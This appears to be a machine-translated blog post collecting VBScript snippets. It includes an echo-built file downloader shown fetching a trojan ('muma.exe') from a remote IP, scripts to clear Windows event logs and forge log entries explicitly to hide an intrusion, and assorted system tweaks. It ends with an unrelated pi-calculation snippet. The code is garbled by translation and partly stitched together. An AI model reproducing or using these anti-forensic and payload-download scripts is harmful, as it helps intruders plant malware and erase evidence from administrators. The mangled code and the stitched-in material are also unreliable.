Record some classic vbs scripts
1. File Download (no echo)
Echo iLocal = LCase (WScript. Arguments (1)> iget. vbe
Echo iRemote = LCase (WScript. Arguments (0)> iget. vbe
Echo Set xPost = createObject ("Microsoft. XMLHTTP")> iget. vbe
Echo xPost. Open "GET", iRemote, 0> iget. vbe
Echo xPost. Send ()> iget. vbe
Echo Set sGet = createObject ("ADODB. Stream")> iget. vbe
Echo sGet. Mode = 3> iget. vbe
Echo sGet. Type = 1> iget. vbe
Echo sGet. Open ()> iget. vbe
Echo sGet. Write (xPost. responseBody)> iget. vbe
Echo sGet. SaveToFile iLocal, 2> iget. vbe
Usage: cscript hget. vbs http: // 111.111.111.111/muma.exe
2. List Processes
@ Echo for each ps in getobject _> ps. vbs
@ Echo ("winmgmts :\\ root \ cimv2: win32_process"). instances _> ps. vbs
@ Echo wscript. echo ps.handle=&vbtab;&ps.name=&vbtab;&ps.exe cutablepath: next> ps. vbs
Usage: cscript ps. vbs
3. Terminate the process
@ Echo for each ps in getobject _> pskill. vbs
@ Echo ("winmgmts :\\ root \ cimv2: win32_process"). instances _> pskill. vbs
@ Echo if ps. handle = wscript. arguments (0) then wscript. echo ps. terminate: end if: next> pskill. vbs
Usage: cscript pskill. vbs pid
4. restart the system
@ Echo for each OS in getobject _> reboot. vbs
@ Echo ("winmgmts :! \. \ Root \ cimv2: win32_operatingsystem "). instances _> reboot. vbs
@ Echo OS. win32shutdown (2): next> reboot. vbs
Usage: cscript reboot. vbs
Eight clever applications of VBS scripts in System Security
The prevalence of VBS script virus has given us a new understanding of VBS features, and now everyone has begun to pay attention to it. VBS code is locally interpreted and executed through Windows Script Host (WSH. WSH is indispensable for VBS script execution. WSH is a language-independent script interpretation mechanism provided by Microsoft Based on the 32-bit Windows platform, it enables the script to run directly on a Windows desktop or command prompt. WSH allows you to manipulate WSH objects, ActiveX objects, registries, and file systems. In Windows 2000, WSH can also be used to access the Windows NT Active Directory Service.
The script compiled with vbs is interpreted by the wscript.exe file in the window and interpreted by the cscript.exe file in the window. Wscript.exe is a script language interpreter that enables the script to be executed, just like executing a batch. You must be familiar with VBS more than I do, so don't talk nonsense. Go to the topic and check out the eight advantages of VBS in system security.
1. Unlock the Registry Editor
Use NotePad to edit the following content:
DIM WSH
Set wsh = WSCRIPT. CreateObject ("WSCRIPT. SHELL ")'
WSH. POPUP ("unlock Registry Editor! ")
'The displayed information "unlock Registry Editor !"
WSH. Regwrite "HKCU \ Software \ Microsoft \ Windows \ CurrentVersion
\ Policies \ System \ DisableRegistryTools ", 0," REG_DWORD"
'Unlock the Registry Editor
WSH. POPUP ("Registry unlocked successfully! ")
'The pop-up message "Registry unlocked successfully!" is displayed !"
Save the file as a. vbs extension. Double-click it when using it.
2. Disable default share of Win NT/2000
Use NotePad to edit the following content:
Dim WSHShell 'defines Variables
Set WSHShell = CreateObject ("WScript. shell") 'creates an object WSHShell that can communicate with the operating system.
Dim fso, dc
Set fso = CreateObject ("Scripting. FileSystemObject") 'create a file system object
Set dc = fso. Drives get all drive letters
For Each d in dc
Dim str
WSHShell. run ("net share" & d. driveletter & "$/delete") 'disable hidden sharing of All Drives
Next
WSHShell. run ("net share admin $/delete ")
WSHShell. run ("net share ipc $/delete") 'disable admin $ and ipc $ pipeline sharing
Now, run cmd.exe and run the net share command to view the shares on your machine. Double-click stopshare. vbs and the window will pop up. Then enter the net share command in cmd. No sharing list is found at this time.
3. display the local IP Address
In many cases, we need to know the IP address of the Local Machine. Although we can use various software, it is very convenient to use VBS scripts. Use NotePad to edit the following content:
Dim WS
Set WS = CreateObject ("MSWinsock. Winsock ")
IPAddress = WS. LocalIP
MsgBox "Local IP =" & IPAddress
Save the preceding content as ShowIP. vbs and double-click it to obtain the local IP address.
4. Use Script Programming to delete logs
After successful system intrusion, The first thing hackers do is to clear logs. If you remotely control the other machine on the GUI or log in from the terminal, deleting logs is not a difficult task, although logs are also run as a service, but unlike services such as http and ftp, logs can be stopped and deleted in the command line, using net stop eventlog in the command line cannot be stopped, so some people think it is very difficult to delete the log in the command line. In fact, this is not the case, for example, the log can be deleted using the VMI in script programming, which is very simple and convenient. The source code is as follows:
StrComputer = "."
Set ob1_miservice = GetObject ("winmgmts :"_
& "{ImpersonationLevel = impersonate, (Backup )}! \\"&_
StrComputer & "\ root \ cimv2 ")
Dim mylogs (3)
Mylogs (1) = "application"
Mylogs (2) = "system"
Mylogs (3) = "security"
For Each logs in mylogs
Set colLogFiles = obw.miservice. ExecQuery _
("Select * from Win32_NTEventLogFile where LogFileName = '" & logs &"'")
For Each objLogfile in colLogFiles
ObjLogFile. ClearEventLog ()
Next
Next
Save the above Code as the cleanevent. vbs file. In the above Code, first obtain the object, and then use its clearEventLog () method to delete the log. Create an array, application, security, and system. You can add an array if there are other logs. Then, a for loop is used to delete each element in the array, that is, each log.
5. Use scripts to forge logs
After deleting the log, any thoughtful administrator will immediately respond to the intrusion when facing the empty log, so a smart hacker will learn how to forge the log. Using the eventlog method in Script Programming to create logs is very simple. Please refer to the following code:
Set ws = wscript. createobject ("Wscript. shell ")
Ws. logevent 0, "write log success" 'create a successful execution log
Save the above Code as createlog. vbs. This code is easy to understand. first obtain a shell object of wscript, and then use the logevent method of the shell object. Logevent usage: logevent eventtype, "description" [, remote system], where eventtype is the log type. The following parameters can be used: 0 indicates successful execution, 1 indicates an execution error, 2 indicates a warning, 4 Information, 8 successful audits, 16 fault audits. So in the code above, change 0 to 1, 2, 4, 8, 16. The content in the quotation marks is the log description. One disadvantage of using this method to write logs is that the logs can only be written to application logs, and the log source can only be WSH, that is, Windows Scripting Host. Therefore, it cannot be concealed, this is for your reference only.
6. Disable the Start menu option
Use NotePad to edit the following content:
Dim ChangeStartMenu
Set ChangeStartMenu = WScript. CreateObject ("WScript. Shell ")
RegPath = "HKCR \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \"
Type_Name = "REG_DWORD"
Key_Data = 1
StartMenu_Run = "NoRun"
StartMenu_Find = "NoFind"
StartMenu_Close = "NoClose"
Sub Change (Argument)
ChangeStartMenu. RegWrite RegPath & Argument, Key_Data, Type_Name
MsgBox ("Success! ")
End Sub
Call Change (StartMenu_Run) 'disables the "run" function in the "Start" menu.
Call Change (StartMenu_Find) 'disables the "Search" function in the "Start" menu
Call Change (StartMenu_Close) 'Disable the system function in the Start Menu.
Save the above Code as the ChangeStartMenu. vbs file. Double-click it when using it.
7. Execute external programs
Use NotePad to edit the following content:
DIM objShell
Set objShell = wscript. createObject ("wscript. shell ")
IReturn = objShell. Run ("cmd.exe/C set var = world", 1, TRUE)
Save it as a. vbs file. In this Code, we first set an environment variable named "var" and" world". Users can replace "cmdcomspecizer" with "cmd.exe" and change the command "set var = world" to other commands to run arbitrary commands.
8. Restart the specified IIS service
Use NotePad to edit the following content:
Const ADS_SERVICE_STOPPED = 1
Set objComputer = GetObject ("WinNT: // MYCOMPUTER, computer ")
Set objService = objComputer. GetObject ("Service", "MYSERVICE ")
If (objService. Status = ADS_SERVICE_STOPPED) Then
ObjService. Start
End If
Store it in the C root directory in the name of startsvc. vbs. Run the following command: cscript c: \ startsvc. vbs. After running, the specified IIS service item will be re-enabled.
Finally, let's talk about how to prevent the VBS script virus. The execution of the VBS virus is inseparable from WSH, which brings convenience to people, while also leaving a chance for the spread of the virus. To prevent the VBS virus, you can uninstall WSH. Just open the control panel, find "Add/delete programs", and click "Windows Installer ", double-click the "attachment" item, and remove "√" of "Windows Scripting Host" in the window that appears, then, the WSH can be detached after "OK" twice in a row. Alternatively, you can click "my computer"> "View"> "Folder Options". In the displayed dialog box, click "file type ", then, you can delete VBS, VBE, JS, and JSE file extensions and application mappings to prevent VBS script viruses.
When the absolute value of the last item is less than 0.000001, the calculation is stopped.
Compile the following VBScript code:
<HTML>
<HEAD> <TITLE> calculate the circumference rate π </TITLE> </HEAD>
<BODY> <H3> calculate the circumference rate π </H3> <HR>
<Input type = "Button" NAME = "Button1" VALUE = "computing">
<Script for = "Button1" EVENT = "onClick" LANGUAGE = "VBScript">
K = 1: s = 1: t = 1: m = 1
Figure 3-12 calculate the circumference Rate
While Abs (t)> 0.0000001
K = k + 2
M =-m
T = m/k
S = s + t
Wend
MsgBox "circumference rate π =" & 4 * s
</SCRIPT>
</BODY>
</HTML>
Run the VBScript program. The browser displays 3-12.
Note: The running time may be long.
Only 30 bytes. What can I write?